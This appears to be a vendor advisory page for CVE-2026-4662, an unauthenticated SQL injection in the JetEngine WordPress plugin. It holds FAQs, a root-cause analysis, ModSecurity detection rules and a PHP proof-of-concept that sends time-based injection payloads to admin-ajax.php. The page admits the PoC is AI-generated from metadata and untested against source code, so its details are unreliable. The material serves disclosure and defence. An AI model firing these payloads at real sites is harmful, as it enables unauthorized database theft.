What is CVE-2026-4662?

CVE-2026-4662 is a high-severity SQL injection vulnerability found in the JetEngine plugin for WordPress, affecting versions up to 3.8.6.1. It allows unauthenticated attackers to manipulate SQL queries via the ‘filtered_query’ parameter, potentially leading to unauthorized access to sensitive database information.

How does the vulnerability work?

The vulnerability arises from the ‘filtered_query’ parameter bypassing HMAC signature validation, allowing attacker-controlled input to reach the SQL Query Builder. This input is not properly sanitized, enabling attackers to inject arbitrary SQL commands through crafted AJAX requests.

Who is affected by this vulnerability?

Any WordPress site using the JetEngine plugin version 3.8.6.1 or earlier is at risk, particularly if it has a Listing Grid with Load More functionality enabled that utilizes a SQL Query Builder. Administrators should check their plugin version and configuration to assess exposure.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the JetEngine plugin version in your WordPress admin dashboard. If it is version 3.8.6.1 or earlier, and you have a Listing Grid with Load More enabled using SQL Query Builder, your site is at risk.

What are the potential impacts of this vulnerability?

Successful exploitation can lead to complete database compromise, allowing attackers to extract sensitive information such as user credentials and personally identifiable information. This poses significant risks for data privacy and compliance with regulations like GDPR.

How can I fix or mitigate this issue?

To remediate this vulnerability, update the JetEngine plugin to version 3.8.6.2 or later, where the issues have been addressed. Additionally, review your site’s configurations to ensure that the Listing Grid functionality is secure.

What does a CVSS score of 7.5 mean?

A CVSS score of 7.5 indicates a high severity vulnerability, suggesting that it poses a significant risk to affected systems. This score reflects the ease of exploitation and the potential impact on confidentiality and data integrity.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a crafted POST request to the WordPress admin-ajax.php endpoint with malicious SQL in the ‘filtered_query’ parameter. This showcases the ability to manipulate SQL queries and extract data.

How can I protect my site from similar vulnerabilities?

To protect your site, keep all plugins and themes updated to their latest versions, regularly audit your WordPress installations for vulnerabilities, and implement security measures such as web application firewalls and monitoring tools.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately take it offline to prevent further data loss, conduct a thorough security audit, and restore from a clean backup. Consider consulting a security professional for assistance.

Are there any known exploits in the wild for this vulnerability?

As of the disclosure date, there have been no publicly reported active exploits for CVE-2026-4662. However, given its severity and ease of exploitation, it is advisable to apply updates promptly to mitigate any potential risks.

What is HMAC signature validation and why is it important?

HMAC (Hash-based Message Authentication Code) signature validation is a security mechanism used to verify the authenticity and integrity of a message. In this context, it is crucial for ensuring that input parameters have not been tampered with, preventing unauthorized access and SQL injection attacks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 24, 2026

CVE-2026-4662: JetEngine <= 3.8.6.1 – Unauthenticated SQL Injection via Listing Grid 'filtered_query' Parameter (jet-engine)

CVE ID CVE-2026-4662

Plugin jet-engine

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 3.8.6.1

Patched Version —

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4662 (metadata-based):
The JetEngine WordPress plugin contains an unauthenticated SQL injection vulnerability in versions up to and including 3.8.6.1. Attackers can exploit this via the ‘listing_load_more’ AJAX action to execute arbitrary SQL commands. The vulnerability requires the target site to have a JetEngine Listing Grid with Load More functionality enabled that uses a SQL Query Builder query. The CVSS 3.1 score of 7.5 (High) reflects the network-based attack vector with no authentication requirements and high confidentiality impact.

Atomic Edge research identifies two root causes based on the vulnerability description. The ‘filtered_query’ parameter bypasses HMAC signature validation, allowing attacker-controlled input to reach vulnerable code. The ‘prepare_where_clause()’ method in the SQL Query Builder fails to sanitize the ‘compare’ operator before concatenation into SQL statements. These conclusions are inferred from the CVE description and CWE-89 classification, not confirmed via source code analysis since the vulnerable plugin version is unavailable for direct examination.

Exploitation occurs through POST requests to the WordPress admin-ajax.php endpoint. Attackers send crafted requests with action=’jet_engine_ajax_listing_load_more’ containing malicious SQL in the ‘filtered_query’ parameter. The payload manipulates the ‘compare’ operator to inject UNION SELECT statements or boolean-based blind SQL queries. Successful exploitation requires identifying a site with the vulnerable Listing Grid configuration, which attackers can discover through reconnaissance or automated scanning.

Remediation likely required two code modifications. The plugin developers needed to include the ‘filtered_query’ parameter in HMAC signature validation to prevent bypass. They also needed to implement proper sanitization of the ‘compare’ operator in the ‘prepare_where_clause()’ method, possibly using prepared statements or strict allow-listing of valid comparison operators. The patched version 3.8.6.2 presumably addresses both issues.

Successful exploitation enables complete database compromise. Attackers can extract sensitive information including user credentials, personally identifiable information, payment data, and other confidential records stored in the WordPress database. The vulnerability does not directly enable privilege escalation or remote code execution according to the CVSS vector, but extracted administrator credentials could facilitate subsequent attacks. Data exposure represents a significant compliance violation under regulations like GDPR and CCPA.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4662 (metadata-based)
# This rule blocks exploitation of the JetEngine SQL injection vulnerability
# by matching the specific AJAX action and parameter structure described in CVE-2026-4662
# The rule requires BOTH the correct AJAX endpoint AND malicious patterns in filtered_query
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1004662,phase:2,deny,status:403,chain,msg:'CVE-2026-4662: JetEngine SQL Injection via listing_load_more AJAX',severity:'CRITICAL',tag:'CVE-2026-4662',tag:'WordPress',tag:'JetEngine',tag:'SQLi'"
  SecRule ARGS_POST:action "@streq jet_engine_ajax_listing_load_more" "chain"
    SecRule ARGS_POST:filtered_query "@rx (?:\"s*(?:OR|AND|UNION|SELECT|SLEEP|BENCHMARK|PG_SLEEP|WAITFOR|IF|CASE)|['"]s*[=<>!]s*['"]s*[ORAND])|--[s-]|/*[^*]**/" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,capture,setvar:'tx.cve_2026_4662_counter=+1'"

# Optional: Block requests with filtered_query containing SQL comment sequences
# when combined with the vulnerable AJAX action
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1004663,phase:2,deny,status:403,chain,msg:'CVE-2026-4662: JetEngine SQL Injection via filtered_query parameter',severity:'CRITICAL',tag:'CVE-2026-4662',tag:'WordPress',tag:'JetEngine',tag:'SQLi'"
  SecRule ARGS_POST:action "@streq jet_engine_ajax_listing_load_more" "chain"
    SecRule ARGS_POST:filtered_query "@rx compares*["']s*:s*["'][^"']*["']s*(?:--|#|/*)" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4662 - JetEngine <= 3.8.6.1 - Unauthenticated SQL Injection via Listing Grid 'filtered_query' Parameter
<?php
/**
 * Proof-of-concept for CVE-2026-4662
 * ASSUMPTIONS:
 * 1. Target site has JetEngine plugin installed (<= v3.8.6.1)
 * 2. Site has a Listing Grid with Load More enabled using SQL Query Builder
 * 3. The 'filtered_query' parameter bypasses HMAC validation
 * 4. The 'compare' operator in prepare_where_clause() lacks sanitization
 *
 * This PoC demonstrates boolean-based blind SQL injection to extract database information.
 * Modify the target_url and adjust SQL payloads based on reconnaissance.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// Base payload structure inferred from vulnerability description
$payload = array(
    'action' => 'jet_engine_ajax_listing_load_more',
    'filtered_query' => '{"meta_query":[{"key":"test","value":"1","compare":"=" OR 1=1 AND SLEEP(5)-- "}]}',
    'widget_settings' => '{}', // Required parameter but content varies
    'page' => '1',
    'listing_id' => '123' // Must match existing Listing Grid ID
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

// Analyze response
if ($error) {
    echo "cURL Error: $errorn";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response Length: " . strlen($response) . " bytesn";
    
    // Check for SQL error indicators
    if (strpos($response, 'SQL syntax') !== false || 
        strpos($response, 'database error') !== false ||
        strpos($response, 'You have an error') !== false) {
        echo "[+] SQL Injection likely successful (error-based)n";
    } else {
        echo "[-] No obvious SQL errors detectedn";
        echo "[?] Try boolean-based blind techniques with time delaysn";
    }
}

// Example time-based injection test
$payload['filtered_query'] = '{"meta_query":[{"key":"test","value":"1","compare":"=" OR IF(1=1,SLEEP(5),0)-- "}]}';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);

$response_time = $end_time - $start_time;
if ($response_time > 4.5) {
    echo "[+] Time-based SQL injection confirmed (delayed response: {$response_time}s)n";
}

?>

Frequently Asked Questions

What is CVE-2026-4662?
Understanding the vulnerability
CVE-2026-4662 is a high-severity SQL injection vulnerability found in the JetEngine plugin for WordPress, affecting versions up to 3.8.6.1. It allows unauthenticated attackers to manipulate SQL queries via the ‘filtered_query’ parameter, potentially leading to unauthorized access to sensitive database information.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the ‘filtered_query’ parameter bypassing HMAC signature validation, allowing attacker-controlled input to reach the SQL Query Builder. This input is not properly sanitized, enabling attackers to inject arbitrary SQL commands through crafted AJAX requests.
Who is affected by this vulnerability?
Identifying at-risk installations
Any WordPress site using the JetEngine plugin version 3.8.6.1 or earlier is at risk, particularly if it has a Listing Grid with Load More functionality enabled that utilizes a SQL Query Builder. Administrators should check their plugin version and configuration to assess exposure.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the JetEngine plugin version in your WordPress admin dashboard. If it is version 3.8.6.1 or earlier, and you have a Listing Grid with Load More enabled using SQL Query Builder, your site is at risk.
What are the potential impacts of this vulnerability?
Understanding the risks
Successful exploitation can lead to complete database compromise, allowing attackers to extract sensitive information such as user credentials and personally identifiable information. This poses significant risks for data privacy and compliance with regulations like GDPR.
How can I fix or mitigate this issue?
Recommended actions
To remediate this vulnerability, update the JetEngine plugin to version 3.8.6.2 or later, where the issues have been addressed. Additionally, review your site’s configurations to ensure that the Listing Grid functionality is secure.
What does a CVSS score of 7.5 mean?
Interpreting the severity rating
A CVSS score of 7.5 indicates a high severity vulnerability, suggesting that it poses a significant risk to affected systems. This score reflects the ease of exploitation and the potential impact on confidentiality and data integrity.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a crafted POST request to the WordPress admin-ajax.php endpoint with malicious SQL in the ‘filtered_query’ parameter. This showcases the ability to manipulate SQL queries and extract data.
How can I protect my site from similar vulnerabilities?
Best practices for security
To protect your site, keep all plugins and themes updated to their latest versions, regularly audit your WordPress installations for vulnerabilities, and implement security measures such as web application firewalls and monitoring tools.
What should I do if I suspect my site has been compromised?
Response steps
If you suspect your site has been compromised, immediately take it offline to prevent further data loss, conduct a thorough security audit, and restore from a clean backup. Consider consulting a security professional for assistance.
Are there any known exploits in the wild for this vulnerability?
Current threat landscape
As of the disclosure date, there have been no publicly reported active exploits for CVE-2026-4662. However, given its severity and ease of exploitation, it is advisable to apply updates promptly to mitigate any potential risks.
What is HMAC signature validation and why is it important?
Understanding security mechanisms
HMAC (Hash-based Message Authentication Code) signature validation is a security mechanism used to verify the authenticity and integrity of a message. In this context, it is crucial for ensuring that input parameters have not been tampered with, preventing unauthorized access and SQL injection attacks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations